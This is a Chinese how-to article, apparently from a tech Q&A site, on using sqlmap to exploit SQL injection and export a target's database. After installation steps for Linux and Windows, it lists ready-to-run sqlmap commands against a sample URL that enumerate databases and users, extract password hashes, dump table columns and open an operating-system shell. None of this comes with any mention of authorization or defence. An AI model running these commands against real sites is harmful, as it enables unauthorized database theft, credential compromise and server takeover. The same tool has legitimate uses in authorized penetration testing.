sqlmap是怎么导出数据库的

sqlmap是怎么导出数据库的,第1张

输入命令sqlmap-u+“风险网址”检测是否存在sql注入漏洞。看到返回了服务器的类型,web环境,数据库类型。确定存在漏洞我们开始下一步的注入。根据返回的数据库类型我们确定数据库为access数据库。使用--tables猜解表。猜解完表格后我们进一步猜解表的内容。命令:pythonsqlmap.py-uURL-Tadmin--columns注意暴力破解的线程数最大为10,其他的参数可以直接回车。猜解完表的内容我们可以直接猜解表列的内容。5等待一段时间后,程序工作完毕,查看结果。

linux安装:

linux安装了git的话直接git clone

// git clone https://github.com/sqlmapproject/sqlmap.git

直接下载:

https://github.com/sqlmapproject/sqlmap/archive/master.zip

unzip ./master.zip

windows下的安装

安装Python2.6 然后设置环境变量。把python添加进去,比如我装到D:\Python26

就在path的最后加 D:\Python26

解压sqlmap到硬盘

比如D:/sqlmap,打开CMD,输入python D:\sqlmap\sqlmap.py 就可以用了。

列几个基本命令

./sqlmap.py –h //查看帮助信息

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据

./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell

1、从sqlmap.org官网直接下载,使用的是windows系统下载.zip文件。

2、在python官网python.org下载python2.7的安装包。

3、python2.7下载默认下一步安装,python2.7需要设置计算机的环境变量,python3可以在安装程序中直接选择。选择开始程序中python点击右键属性查看安装目录。

4、右键计算机选择属性,打开高级系统设置选择高级点击环境变量。

5、查看系统环境变量Path,将刚才查看python安装目录复制进去。在命令提示框中输入python检测是否成功。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/sjk/10819916.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-11
下一篇 2023-05-11

发表评论

登录后才能评论

评论列表(0条)

保存